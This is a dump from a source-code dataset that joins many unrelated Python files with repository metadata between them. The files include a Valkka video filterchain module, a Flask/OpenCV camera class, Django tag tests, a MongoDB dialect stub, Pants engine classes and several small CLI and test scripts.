"""
import sys
import time
import random
# so, everything that has .core, refers to the api1 level (i.e. swig
# wrapped cpp code)
from valkka import core
# api2 versions of the thread classes
from valkka.api2.threads import LiveThread
from valkka.api2.tools import parameterInitCheck, typeCheck
from valkka.api2.valkkafs import ValkkaFSManager
pre_mod = __name__
class ValkkaFSLiveFilterchain:
"""This class implements the following filterchain:
ValkkaFSLiveFilterchain:
::
+---> (AVThread:avthread) -------> {ForkFrameFilterN:fork_yuv} -------+
| |
(LiveThread:livethread) --> {ForkFrameFilterN:fork} --------+ request forked H264 stream +--->> OpenGLThread (connected by user)
| |
ValkkaFSWriterThread <<----+ + request forked YUV
ValkkaFSFileFilterchain:
::
ValkkaFSReaderThread -->> FileCacherThread ------------->> {ForkFrameFilterN:fork} ------+
|
{ForkFrameFilterN:fork_yuv} <-- (AVThread:avthread) <<-------+
| |
| + request forked H264 stream
+--->>> OpenGLThread (connected by user)
|
+ request forked YUV
ValkkaFSManager:
- ValkkaFSWriterThread
- ValkkaFSReaderThread
- FileCacherThread
"""
parameter_defs = {
"livethread": LiveThread,
"valkkafsmanager": ValkkaFSManager,
"address": str,
"slot": int,
"id_rec": int,
# these are for the AVThread instance:
"n_basic": (int, 20), # number of payload frames in the stack
"n_setup": (int, 20), # number of setup frames in the stack
"n_signal": (int, 20), # number of signal frames in the stack
"affinity": (int, -1),
"verbose": (bool, False),
"msreconnect": (int, 0),
# Timestamp correction type: TimeCorrectionType_none,
# TimeCorrectionType_dummy, or TimeCorrectionType_smart (default)
"time_correction": None,
# Operating system socket ringbuffer size in bytes # 0 means default
"recv_buffer_size": (int, 0),
# Reordering buffer time for Live555 packets in MILLIseconds # 0 means
# default
"reordering_mstime": (int, 0)
}
def __init__(self, **kwargs):
# auxiliary string for debugging output
self.pre = self.__class__.__name__ + " : "
# check for input parameters, attach them to this instance as
# attributes
parameterInitCheck(self.parameter_defs, kwargs, self)
self.init()
def init(self):
self.idst = str(id(self))
self.makeChain()
self.startThreads()
self.active = True
def __del__(self):
self.close()
def close(self):
if (self.active):
if (self.verbose):
print(self.pre, "Closing threads and contexes")
self.decodingOff()
self.closeLiveContext()
self.stopThreads()
self.active = False
def makeChain(self):
"""Create the filterchains
"""
self.fork = core.ForkFrameFilterN("fork_" + str(self.slot))
self.fork_yuv = core.ForkFrameFilterN("fork_yuv_" + str(self.slot))
self.framefifo_ctx = core.FrameFifoContext()
self.framefifo_ctx.n_basic = self.n_basic
self.framefifo_ctx.n_setup = self.n_setup
self.framefifo_ctx.n_signal = self.n_signal
self.framefifo_ctx.flush_when_full = True
self.avthread = core.AVThread(
"avthread_" + self.idst,
self.fork_yuv, # writes to self.fork_yuv
self.framefifo_ctx)
self.avthread.setAffinity(self.affinity)
# initial connections : live stream
self.createLiveContext() # LiveThread writes to self.fork
self.connect_to_stream("live_decode_"+str(self.slot), self.avthread.getFrameFilter()) # self.fork to AVThread
self.connect_to_stream("recorder_"+str(self.slot), self.valkkafsmanager.getInputFrameFilter()) # self.fork to ValkkaFSWriterThread
self.valkkafsmanager.setInput(self.id_rec, self.slot)
def connect_to_stream(self, name, framefilter):
return self.fork.connect(name, framefilter)
def connect_to_yuv(self, name, framefilter):
return self.fork_yuv.connect(name, framefilter)
def disconnect_from_stream(self, name):
return self.fork.disconnect(name)
def disconnect_from_yuv(self, name):
return self.fork_yuv.disconnect(name)
def createLiveContext(self):
"""Creates a LiveConnectionContext and registers it to LiveThread
"""
self.ctx = core.LiveConnectionContext()
self.ctx.slot = self.slot
if (self.address.find("rtsp://") == 0):
self.ctx.connection_type = core.LiveConnectionType_rtsp
else:
self.ctx.connection_type = core.LiveConnectionType_sdp
self.ctx.address = self.address
self.ctx.framefilter = self.fork # writes to self.fork
self.ctx.msreconnect = self.msreconnect
# some extra parameters
"""
ctx.time_correction =TimeCorrectionType::none;
ctx.time_correction =TimeCorrectionType::dummy;
default time correction is smart
ctx.recv_buffer_size=1024*1024*2; // Operating system ringbuffer size for incoming socket
ctx.reordering_time =100000; // Live555 packet reordering treshold time (microsecs)
"""
if (self.time_correction is not None):
self.ctx.time_correction = self.time_correction
self.ctx.recv_buffer_size = self.recv_buffer_size
self.ctx.reordering_time = self.reordering_mstime * 1000 # from millisecs to microsecs
# send the information about the stream to LiveThread
self.livethread.registerStream(self.ctx)
self.livethread.playStream(self.ctx)
def closeLiveContext(self):
self.livethread.stopStream(self.ctx)
self.livethread.deregisterStream(self.ctx)
def startThreads(self):
"""Starts thread required by the filter chain
"""
self.avthread.startCall()
def stopThreads(self):
"""Stops threads in the filter chain
"""
self.avthread.stopCall()
def decodingOff(self):
self.avthread.decodingOffCall()
def decodingOn(self):
self.avthread.decodingOnCall()
class ValkkaFSFileFilterchain:
"""This class implements the following filterchain:
ValkkaFSLiveFilterchain:
::
+---> (AVThread:avthread) -------> {ForkFrameFilterN:fork_yuv} -------+
| |
(LiveThread:livethread) --> {ForkFrameFilterN:fork} --------+ request forked H264 stream +--->> OpenGLThread (connected by user)
| |
ValkkaFSWriterThread <<----+ + request forked YUV
ValkkaFSFileFilterchain:
::
ValkkaFSReaderThread -->> FileCacherThread ------------->> {ForkFrameFilterN:fork} ------+
|
{ForkFrameFilterN:fork_yuv} <-- (AVThread:avthread) <<-------+
| |
| + request forked H264 stream
+--->>> OpenGLThread (connected by user)
|
+ request forked YUV
ValkkaFSManager:
- ValkkaFSWriterThread
- ValkkaFSReaderThread
- FileCacherThread
"""
parameter_defs = {
"valkkafsmanager": ValkkaFSManager,
"slot": int,
"id_rec": int,
# these are for the AVThread instance:
"n_basic": (int, 20), # number of payload frames in the stack
"n_setup": (int, 20), # number of setup frames in the stack
"n_signal": (int, 20), # number of signal frames in the stack
"affinity": (int, -1),
"verbose": (bool, False),
"msreconnect": (int, 0)
}
def __init__(self, **kwargs):
# auxiliary string for debugging output
self.pre = self.__class__.__name__ + " : "
# check for input parameters, attach them to this instance as
# attributes
parameterInitCheck(self.parameter_defs, kwargs, self)
self.init()
def init(self):
self.idst = str(id(self))
self.makeChain()
self.startThreads()
self.active = True
def __del__(self):
self.close()
def close(self):
if (self.active):
if (self.verbose):
print(self.pre, "Closing threads and contexes")
self.decodingOff()
self.valkkafsmanager.clearOutput(self.ctx)
self.stopThreads()
self.active = False
def makeChain(self):
"""Create the filterchains
"""
self.fork = core.ForkFrameFilterN("fork_" + str(self.slot))
self.fork_yuv = core.ForkFrameFilterN("fork_yuv_" + str(self.slot))
self.framefifo_ctx = core.FrameFifoContext()
self.framefifo_ctx.n_basic = self.n_basic
self.framefifo_ctx.n_setup = self.n_setup
self.framefifo_ctx.n_signal = self.n_signal
self.framefifo_ctx.flush_when_full = True
self.avthread = core.AVThread(
"avthread_" + self.idst,
self.fork_yuv, # writes to self.fork_yuv
self.framefifo_ctx)
self.avthread.setAffinity(self.affinity)
self.info = core.InfoFrameFilter("debug")
# initial connections : recorded stream
self.connect_to_stream("rec_decode_"+str(self.slot), self.avthread.getBlockingFrameFilter()) # self.fork to AVThread
# self.connect_to_stream("rec_decode_"+str(self.slot), self.info) # debug
# # self.valkkafs.setOutput(_id, slot, framefilter)
self.ctx = self.valkkafsmanager.setOutput(self.id_rec, self.slot, self.fork) # recorded stream to self.fork
# self.connect_to_yuv("debug", self.info) # debug
def connect_to_stream(self, name, framefilter):
return self.fork.connect(name, framefilter)
def connect_to_yuv(self, name, framefilter):
return self.fork_yuv.connect(name, framefilter)
def disconnect_from_stream(self, name):
return self.fork.disconnect(name)
def disconnect_from_yuv(self, name):
return self.fork_yuv.disconnect(name)
def startThreads(self):
"""Starts thread required by the filter chain
"""
self.avthread.startCall()
def stopThreads(self):
"""Stops threads in the filter chain
"""
self.avthread.stopCall()
def decodingOff(self):
self.avthread.decodingOffCall()
def decodingOn(self):
self.avthread.decodingOnCall()
def main():
pre = pre_mod + "main :"
print(pre, "main: arguments: ", sys.argv)
if (len(sys.argv) < 2):
print(pre, "main: needs test number")
else:
st = "test" + str(sys.argv[1]) + "()"
exec(st)
if (__name__ == "__main__"):
main()
| 36.55409 | 175 | 0.548939 |
79464e7a260c7fa76dd9eb8bfbc93f46605a5ab6 | 2,429 | py | Python | flask/camera.py | mscschliemann/final_project | 6d3b1ff6288bfbd14997d0a64877ebc4294de82f | [
"MIT"
] | null | null | null | flask/camera.py | mscschliemann/final_project | 6d3b1ff6288bfbd14997d0a64877ebc4294de82f | [
"MIT"
] | null | null | null | flask/camera.py | mscschliemann/final_project | 6d3b1ff6288bfbd14997d0a64877ebc4294de82f | [
"MIT"
] | null | null | null | import cv2
from classfiles.yolo_hand import YOLO
from opencv_convex_hull import cv_process
class VideoCamera(object):
def __init__(self):
# Using OpenCV to capture from device 0. If you have trouble capturing
# from a webcam, comment the line below out and use a video file
# instead.
self.video = cv2.VideoCapture(0)
# If you decide to use video.mp4, you must have this file in the folder
# as the main.py.
# self.video = cv2.VideoCapture('video.mp4')
self.yolo = YOLO("models/cross-hands-tiny.cfg", "models/cross-hands-tiny.weights", ["hand"])
def __del__(self):
self.video.release()
def get_frame(self):
success, image = self.video.read()
# We are using Motion JPEG, but OpenCV defaults to capture raw images,
# so we must encode it into JPEG in order to correctly display the
# video stream.
ret, jpeg = cv2.imencode('.jpg', image)
return jpeg.tobytes()
def get_boxed_frame(self):
rval, frame = self.video.read()
width, height, inference_time, results = self.yolo.inference(frame)
for detection in results:
id, name, confidence, x, y, w, h = detection
cx = x + (w / 2)
cy = y + (h / 2)
# draw a bounding box rectangle and label on the image
color = (0, 255, 255)
cv2.rectangle(frame, (x, y), (x + w, y + h), color, 2)
text = "%s (%s)" % (name, round(confidence, 2))
cv2.putText(frame, text, (x, y - 5), cv2.FONT_HERSHEY_SIMPLEX, 0.5, color, 2)
ret, jpeg = cv2.imencode('.jpg', frame)
return jpeg.tobytes()
def get_thresh_frame(self, rect):
rval, frame = self.video.read()
crop_img = frame[rect[0][0]:rect[1][0], rect[0][1]:rect[1][1]]
grey = cv2.cvtColor(crop_img, cv2.COLOR_BGR2GRAY)
# applying gaussian blur
value = (35, 35)
blurred = cv2.GaussianBlur(grey, value, 0)
# thresholdin: Otsu's Binarization method
_, thresh1 = cv2.threshold(blurred, 127, 255, cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)
ret, jpeg = cv2.imencode('.jpg', thresh1)
return jpeg.tobytes()
def get_game_frame(self, rect):
rval, frame = self.video.read()
img = cv_process(frame, rect)
ret, jpeg = cv2.imencode('.jpg', img)
return jpeg.tobytes()
| 38.555556 | 100 | 0.599424 |
79464ede837992597060035ea9f6ffb3de562dd3 | 1,469 | py | Python | utils/tests/test_views.py | maznu/peering-manager | d249fcf530f4cc48b39429badb79bc203e0148ba | [
"Apache-2.0"
] | 127 | 2017-10-12T00:27:45.000Z | 2020-08-07T11:13:55.000Z | utils/tests/test_views.py | maznu/peering-manager | d249fcf530f4cc48b39429badb79bc203e0148ba | [
"Apache-2.0"
] | 247 | 2017-12-26T12:55:34.000Z | 2020-08-08T11:57:35.000Z | utils/tests/test_views.py | maznu/peering-manager | d249fcf530f4cc48b39429badb79bc203e0148ba | [
"Apache-2.0"
] | 63 | 2017-10-13T06:46:05.000Z | 2020-08-08T00:41:57.000Z | import uuid
from django.contrib.auth.models import User
from utils.enums import ObjectChangeAction
from utils.models import ObjectChange, Tag
from utils.testing import ViewTestCases
class ObjectChangeTestCase(ViewTestCases.ReadOnlyObjectViewTestCase):
model = ObjectChange
test_changelog_object = None
test_create_object = None
test_edit_object = None
test_delete_object = None
test_bulk_edit_objects = None
test_bulk_delete_objects = None
@classmethod
def setUpTestData(cls):
tag = Tag(name="Tag 1", slug="tag-1")
tag.save()
user = User.objects.create_user(username="testuser2")
for i in range(1, 4):
uid = uuid.uuid4()
change = tag.to_objectchange(ObjectChangeAction.UPDATE)
change.user = user
change.request_id = uid
change.save()
class TagTestCase(ViewTestCases.OrganizationalObjectViewTestCase):
model = Tag
test_changelog_object = None
@classmethod
def setUpTestData(cls):
Tag.objects.bulk_create(
(
Tag(name="Tag 1", slug="tag-1"),
Tag(name="Tag 2", slug="tag-2"),
Tag(name="Tag 3", slug="tag-3"),
)
)
cls.form_data = {
"name": "Tag 4",
"slug": "tag-4",
"color": "c0c0c0",
"comments": "Some comments",
}
cls.bulk_edit_data = {"color": "00ff00"}
| 25.77193 | 69 | 0.603812 |
79464efeae8c8fa3200d4558949587bd6ad306fc | 2,167 | py | Python | mongodb_dialect/connection.py | kitfactory/mongodb_dialect | 1746d2aca08be4b12adb74e3a6806f8d840f6382 | [
"MIT"
] | null | null | null | mongodb_dialect/connection.py | kitfactory/mongodb_dialect | 1746d2aca08be4b12adb74e3a6806f8d840f6382 | [
"MIT"
] | null | null | null | mongodb_dialect/connection.py | kitfactory/mongodb_dialect | 1746d2aca08be4b12adb74e3a6806f8d840f6382 | [
"MIT"
] | null | null | null | import os
# import pandas as pd
from sqlalchemy import types
# from ps_parser import PandasSqlParser
from .cursor import MongoDBDialectCursor
from .log import logger
class MongoDBDialectConnection(object):
# TODO Here should be modified
FILE_DIR = '/vagrant'
def __init__(self, username=None, password=None, host=None, database=None, **kwargs):
print("MonogoDBDialectConnection#__init__")
self.host = host
self.database = database
self.username = username
self.password = password
# self.xl = pd.ExcelFile(os.path.join(self.FILE_DIR, database) + '.xlsx')
self.limit = kwargs['limit'] if 'limit' in kwargs else 100000
def close(self):
logger.debug('Connection closed.')
self.xl.close()
def commit(self):
logger.debug('Commit.')
# self.xl.close()
def rollback(self):
logger.debug('Rollback.')
def list_tables(self):
return self.xl.sheet_names
def list_columns(self, table_name):
tb = self.xl.parse(table_name)
return [{'name': str(c), 'type': types.String, 'nullable': False, 'default': None} for c in tb.columns]
def table_path(self, table_name):
return os.path.join(self.FILE_DIR, self.database, ':', table_name)
def load_table(self, table_name):
return self.xl.parse(table_name)
def load_all_table(self, table_names):
context = {}
for tb_name in table_names:
context[tb_name] = self.load_table(tb_name)
return context
def query(self, sql):
print("query")
# psp = PandasSqlParser(sql)
table_names = []
for db_name, tb_name in psp.source_tables(True):
table_names.append(tb_name)
context = self.load_all_table(table_names)
# result_df = psp.execute(context)
# return result_df, context
def cursor(self):
print("request cursor")
return MongoDBDialectCursor(self)
def connect(username=None, password=None, host=None, database=None, **kwargs):
print("connect")
return MongoDBDialectConnection(username, password, host, database, **kwargs) | 30.521127 | 111 | 0.651131 |
79464f12f31e0da32d4475d26a399c436465c27f | 92 | py | Python | bin/start-server.py | IzioDev/gitmaster-chatbot | f0e119f4bfd7cf62c0942a2b821272b1d59509cf | [
"MIT"
] | null | null | null | bin/start-server.py | IzioDev/gitmaster-chatbot | f0e119f4bfd7cf62c0942a2b821272b1d59509cf | [
"MIT"
] | 4 | 2021-10-06T18:32:37.000Z | 2022-02-27T06:23:56.000Z | bin/start-server.py | IzioDev/gitmaster-chatbot | f0e119f4bfd7cf62c0942a2b821272b1d59509cf | [
"MIT"
] | null | null | null | import subprocess
subprocess.run("rasa run actions --auto-reload", shell=True, check=True)
| 23 | 72 | 0.771739 |
7946505dded0b5a47aea545d71c5f54731ad31b8 | 2,600 | py | Python | src/python/pants/engine/engine_aware.py | rcuza/pants | 0429258b181986eed856ae45af93b776727774a0 | [
"Apache-2.0"
] | 1 | 2021-02-22T18:11:26.000Z | 2021-02-22T18:11:26.000Z | src/python/pants/engine/engine_aware.py | rcuza/pants | 0429258b181986eed856ae45af93b776727774a0 | [
"Apache-2.0"
] | 13 | 2022-02-18T22:52:57.000Z | 2022-03-30T10:11:29.000Z | src/python/pants/engine/engine_aware.py | rcuza/pants | 0429258b181986eed856ae45af93b776727774a0 | [
"Apache-2.0"
] | 2 | 2021-05-11T07:51:26.000Z | 2021-05-19T10:14:46.000Z | # Copyright 2020 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
from abc import ABC
from typing import Any, Optional
from pants.engine.fs import FileDigest, Snapshot
from pants.util.logging import LogLevel
class EngineAwareParameter(ABC):
"""A marker class for rule parameters that allows sending additional metadata to the engine.
When Pants executes a rule, the engine will call this marker class's methods on the rule's
inputs to see if they implement any of the methods. If the method returns `None`, the engine
will do nothing; otherwise, it will use the additional metadata provided.
"""
def debug_hint(self) -> Optional[str]:
"""If implemented, this string will be shown in `@rule` debug contexts if that rule takes
the annotated type as a parameter."""
return None
class EngineAwareReturnType(ABC):
"""A marker class for types that are returned by rules to allow sending additional metadata to
the engine.
When Pants finishes executing a rule, the engine will call this marker class's methods to see if
it implements any of the methods. If the method returns `None`, the engine will do nothing;
otherwise, it will use the additional metadata provided.
"""
def level(self) -> LogLevel | None:
"""If implemented, this method will modify the level of the workunit associated with any
`@rule`s that return the annotated type.
For instance, this can be used to change a workunit that would normally be at `Debug` level
to `Warn` if an anomalous condition occurs within the `@rule`.
"""
return None
def message(self) -> str | None:
"""If implemented, this adds a result message to the workunit for any `@rule`'s that return
the annotated type.
The final message will take the form "Completed: <Rule description> - <this method's return
value>". This method may use newlines.
"""
return None
def artifacts(self) -> dict[str, FileDigest | Snapshot] | None:
"""If implemented, this sets the `artifacts` entry for the workunit of any `@rule`'s that
return the annotated type.
`artifacts` is a mapping of arbitrary string keys to `Snapshot`s or `FileDigest`s.
"""
return None
def metadata(self) -> dict[str, Any] | None:
"""If implemented, adds arbitrary key-value pairs to the `metadata` entry of the `@rule`
workunit."""
return None
| 38.80597 | 100 | 0.689615 |
7946506148a0502c84b47c13173e1863b700995b | 48 | py | Python | ipyvuetify/extra/__init__.py | Carifio24/ipyvuetify | 59a9922ed93d1d5e61593243985566bc473caa98 | [
"MIT"
] | 242 | 2019-05-14T17:55:18.000Z | 2022-02-09T15:57:12.000Z | ipyvuetify/extra/__init__.py | guimillet/ipyvuetify | 6acd14a567e5b477b1f2baa5c92f0429b459139a | [
"MIT"
] | 172 | 2019-05-20T18:32:00.000Z | 2022-02-15T11:05:17.000Z | ipyvuetify/extra/__init__.py | guimillet/ipyvuetify | 6acd14a567e5b477b1f2baa5c92f0429b459139a | [
"MIT"
] | 44 | 2019-05-14T18:41:48.000Z | 2022-02-03T17:51:24.000Z | from .file_input import FileInput # noqa: F401
| 24 | 47 | 0.770833 |
7946521b1c3aff5788fd7caac5148ef434d2a17b | 4,456 | py | Python | bin/finalize_microbiome_entities.py | nf-core/metapep | 8229ef0d1086681e7d7094f1e794725b0e5011f9 | [
"MIT"
] | 1 | 2021-11-19T17:19:28.000Z | 2021-11-19T17:19:28.000Z | bin/finalize_microbiome_entities.py | AntoniaSchuster/metapep | a425e3c0602d5149a8a634b10b682d9f6ed924c8 | [
"MIT"
] | 34 | 2020-12-07T19:46:25.000Z | 2021-01-25T14:44:42.000Z | bin/finalize_microbiome_entities.py | skrakau/metapep | a425e3c0602d5149a8a634b10b682d9f6ed924c8 | [
"MIT"
] | 2 | 2021-08-19T08:09:36.000Z | 2021-12-13T08:45:25.000Z | #!/usr/bin/env python3
####################################################################################################
#
# Author: Leon Kuchenbecker
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
####################################################################################################
import argparse
import sys
import pandas as pd
####################################################################################################
class PartialWeightsError(RuntimeError):
pass
####################################################################################################
def parse_args():
"""Parse the command line arguments"""
parser = argparse.ArgumentParser()
parser.add_argument("-eme", "--entrez-microbiomes-entities", required=True, metavar="PATH", type=str, nargs="?", help="Microbiomes entities map from Entrez (microbiome_id, entity_name, entity_weight)")
parser.add_argument("-nme", "--nucl-microbiomes-entities", required=True, metavar="PATH", type=str, nargs="?", help="Microbiomes entities map from nucleotide methods (microbiome_id, entity_name, entity_weight)")
parser.add_argument("-menw", "--microbiomes-entities-noweights", required=True, metavar="PATH", type=str, help="Preliminary microbiome entity map (microbiome_id, entity_id) w/o weights.")
parser.add_argument("-ent", "--entities", required=True, metavar="PATH", type=str, help="Entity map (entity_id, entity_name)")
parser.add_argument("-o", "--output", required=True, metavar="PATH", type=argparse.FileType('w'), help="Output file (microbiome_id, entity_id, entity_weight)")
return parser.parse_args()
def process_weights(subset):
"""Check the integrity of the weights for a subset of the data representing
one microbiome. If all weights are present, do nothing. If no weights are
present, assign uniform weights. Otherwise, raise an error."""
if subset['entity_weight'].isnull().all():
subset['entity_weight'] = 1
elif not subset['entity_weight'].isnull().any():
pass
else:
raise PartialWeightsError(subset['microbiome_id'].iloc[0])
return subset
####################################################################################################
args = parse_args()
if not args.entrez_microbiomes_entities and not args.nucl_microbiomes_entities:
sys.exit("Neither --entrez-microbiome-entities nor --nucl-microbiome-entities were specified. Aborting.")
# Read and join the tables that provide microbiome_id, entity_id and entity_name
entity_microbiome = pd.read_csv(args.microbiomes_entities_noweights, sep='\t')
entity = pd.read_csv(args.entities, sep='\t')
entity_microbiome = entity_microbiome.merge(entity)
# Read the tables that provide the weights and concatenate them
input_data = pd.concat([ pd.read_csv(e, sep='\t') for e in [args.entrez_microbiomes_entities, args.nucl_microbiomes_entities] if e ])
# Join the weights against the entity ids table, which contains all entities
# that we have observed in upstream processes. Thus, per microbiome, we expect
# to find weights either for all of them or for none of them.
result = entity_microbiome.merge(input_data, how="left").drop(columns="entity_name")
# For each microbiome, we now check whether this assumption is true. If we find
# no weights for a microbiome, we add uniform weights.
try:
result = result.groupby("microbiome_id")\
.apply(process_weights)
result.to_csv(args.output, sep='\t', index=False, header=True)
except PartialWeightsError as e:
sys.exit(f"Inconsist weight specifications. Weights were specified for only a subset of entities in microbiome with microbiome ID {e}.")
| 51.218391 | 239 | 0.633079 |
7946526d5fb6040d4417cb9f3db4b1bd003e4142 | 398 | py | Python | ebu_tt_live/examples/__init__.py | ebu/ebu-tt-live-toolk | 8c67f83010d9fc0af5d3e270c70dce87674ad289 | [
"BSD-3-Clause"
] | 22 | 2016-01-12T10:24:27.000Z | 2022-02-17T15:40:09.000Z | ebu_tt_live/examples/__init__.py | ebu/ebu-tt-live-toolk | 8c67f83010d9fc0af5d3e270c70dce87674ad289 | [
"BSD-3-Clause"
] | 532 | 2016-04-22T13:44:11.000Z | 2021-12-21T17:39:36.000Z | ebu_tt_live/examples/__init__.py | ebu/ebu-tt-live-toolk | 8c67f83010d9fc0af5d3e270c70dce87674ad289 | [
"BSD-3-Clause"
] | 8 | 2016-04-04T12:38:30.000Z | 2019-09-05T08:01:58.000Z | from pkg_resources import ResourceManager, get_provider
def get_example_data(dataset_name):
"""
This is a smart package loader that locates text files inside our package
:param dataset_name:
:return:
"""
provider = get_provider('ebu_tt_live')
manager = ResourceManager()
source = provider.get_resource_string(manager, 'examples/'+dataset_name)
return source
| 24.875 | 77 | 0.728643 |
794653393022035a16f39195d778530bbf680f0c | 1,969 | py | Python | trailblazer/cli/delete.py | jemten/trailblazer | dce3fe6ffd19e23c94fb6e223e4778a1c93960c9 | [
"MIT"
] | null | null | null | trailblazer/cli/delete.py | jemten/trailblazer | dce3fe6ffd19e23c94fb6e223e4778a1c93960c9 | [
"MIT"
] | null | null | null | trailblazer/cli/delete.py | jemten/trailblazer | dce3fe6ffd19e23c94fb6e223e4778a1c93960c9 | [
"MIT"
] | null | null | null | from pathlib import Path
import shutil
import click
@click.command()
@click.option('-f', '--force', is_flag=True, help='skip sanity checks')
@click.option('-y', '--yes', is_flag=True, help='skip manual confirmations')
@click.argument('analysis_id', type=int)
@click.pass_context
def delete(context, force, yes, analysis_id):
"""Delete an analysis log from the database."""
analysis_obj = context.obj['store'].analysis(analysis_id)
if analysis_obj is None:
print(click.style('analysis log not found', fg='red'))
context.abort()
print(click.style(f"{analysis_obj.family}: {analysis_obj.status}"))
if analysis_obj.is_temp:
if yes or click.confirm(f"remove analysis log?"):
analysis_obj.delete()
context.obj['store'].commit()
print(click.style(f"analysis deleted: {analysis_obj.family}", fg='blue'))
else:
if analysis_obj.is_deleted:
print(click.style(f"{analysis_obj.family}: already deleted", fg='red'))
context.abort()
if Path(analysis_obj.out_dir).exists():
root_dir = context.obj['store'].families_dir
family_dir = analysis_obj.out_dir
if not force and (len(family_dir) <= len(root_dir) or root_dir not in family_dir):
print(click.style(f"unknown analysis output dir: {analysis_obj.out_dir}", fg='red'))
print(click.style("use '--force' to override"))
context.abort()
if yes or click.confirm(f"remove analysis output: {analysis_obj.out_dir}?"):
shutil.rmtree(analysis_obj.out_dir, ignore_errors=True)
analysis_obj.is_deleted = True
context.obj['store'].commit()
print(click.style(f"analysis deleted: {analysis_obj.family}", fg='blue'))
else:
print(click.style(f"analysis output doesn't exist: {analysis_obj.out_dir}", fg='red'))
context.abort()
| 41.893617 | 100 | 0.631793 |
79465639827a1e7c5a2b4bb30a8aa456c4990488 | 867 | py | Python | tests/test_x2gray.py | samueljsluo/scikit-opt | b0676d5c659b9c2cd42a62d6099c02391cf381e6 | [
"MIT"
] | 3,178 | 2017-12-06T06:38:09.000Z | 2022-03-31T14:30:10.000Z | tests/test_x2gray.py | t3bol90/scikit-opt | 9282fcb6aadff3d4fbf16a36d2523735bbd1343b | [
"MIT"
] | 158 | 2018-01-21T02:21:29.000Z | 2022-03-19T11:12:54.000Z | tests/test_x2gray.py | t3bol90/scikit-opt | 9282fcb6aadff3d4fbf16a36d2523735bbd1343b | [
"MIT"
] | 807 | 2018-01-21T02:19:00.000Z | 2022-03-30T13:24:40.000Z | # -*- coding: utf-8 -*-
# @Time : 2019/10/15
# @Author : github.com/Agrover112 , github.com/guofei9987
import numpy as np
from sko.GA import GA
from sko.tool_kit import x2gray
import unittest
class TestX2Gray(unittest.TestCase):
def test_x2gray(self):
cases = [
[2, [-1, -1], [1, 1], 1e-7],
[5, [-10, -1, -3, -4.5, 1.5], [1, 3, 5, 7.8, 9.8], 1e-7],
[3, [0, -5, -10], [15, 10, 5], 1],
]
for n_dim, lb, ub, precision in cases:
ga = GA(func=lambda x: x, n_dim=n_dim, size_pop=200, max_iter=800, lb=lb, ub=ub, precision=precision)
value = ga.chrom2x(ga.Chrom)
chrom2 = x2gray(x=value, n_dim=n_dim, lb=lb, ub=ub, precision=precision)
self.assertTrue(np.allclose(ga.Chrom, chrom2),msg='x2gray error')
if __name__ == '__main__':
unittest.main() | 27.967742 | 113 | 0.564014 |
7946567ba9af252e225e9b8601e6b3cb772c3dcb | 1,278 | py | Python | tests/test_converters/test_conda.py | OliverHofkens/dephell | 6303f416018910668f1635b70cd828a2fd2b2d9e | [
"MIT"
] | 1,880 | 2019-03-21T10:08:25.000Z | 2022-03-31T12:41:55.000Z | tests/test_converters/test_conda.py | rachmadaniHaryono/dephell | 0ef500c8f2d5f05244bac191b1b1383f68464cd2 | [
"MIT"
] | 356 | 2019-03-21T19:08:56.000Z | 2021-01-08T17:45:43.000Z | tests/test_converters/test_conda.py | rachmadaniHaryono/dephell | 0ef500c8f2d5f05244bac191b1b1383f68464cd2 | [
"MIT"
] | 157 | 2019-04-23T01:13:37.000Z | 2022-03-24T22:41:18.000Z | # project
from dephell.controllers import DependencyMaker
from dephell.converters.conda import CondaConverter
from dephell.models import Requirement, RootDependency
from dephell.yaml import yaml_load
def test_conda_loads():
content = '\n'.join([
'name: deeplearning',
'channels:',
'- defaults',
'- conda-forge',
'dependencies:',
'- python=3.6',
'- matplotlib=2.0.2',
'- numpy',
])
root = CondaConverter().loads(content=content)
assert str(root.name) == 'deeplearning'
assert str(root.python) == '==3.6.*'
deps = {dep.name: str(dep.constraint) for dep in root.dependencies}
assert deps == {'matplotlib': '==2.0.2', 'numpy': ''}
def test_conda_dumps_new():
root = RootDependency(raw_name='check-me')
deps = []
deps.extend(DependencyMaker.from_requirement(source=root, req='matplotlib==2.0.2'))
deps.extend(DependencyMaker.from_requirement(source=root, req='numpy'))
reqs = [Requirement(dep=dep, lock=False) for dep in deps]
content = CondaConverter().dumps(reqs=reqs, project=root)
doc = yaml_load(content)
assert doc['name'] == 'check-me'
assert doc['channels'] == ['defaults']
assert doc['dependencies'] == ['matplotlib ==2.0.2', 'numpy']
| 31.95 | 87 | 0.647105 |
794656d3899a8a212cf2f9815a114b7aa7aab897 | 5,572 | py | Python | rover/core/servers/imu/runImuOnly.py | CSUFTitanRover/TitanRover2018 | 4926d377322a37ba644d7e852faa305fb8bb9b55 | [
"Apache-2.0"
] | 16 | 2017-09-01T23:33:17.000Z | 2021-01-04T02:41:19.000Z | rover/core/servers/imu/runImuOnly.py | CSUFTitanRover/TitanRover2018 | 4926d377322a37ba644d7e852faa305fb8bb9b55 | [
"Apache-2.0"
] | 56 | 2017-08-30T01:14:46.000Z | 2021-02-28T22:18:44.000Z | rover/core/servers/imu/runImuOnly.py | CSUFTitanRover/TitanRover2018 | 4926d377322a37ba644d7e852faa305fb8bb9b55 | [
"Apache-2.0"
] | 15 | 2017-09-14T19:55:55.000Z | 2020-05-03T19:44:39.000Z | # Simple Adafruit BNO055 sensor reading example. Will print the orientation
# and calibration data every second.
#
# Copyright (c) 2015 Adafruit Industries
# Author: Tony DiCola
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
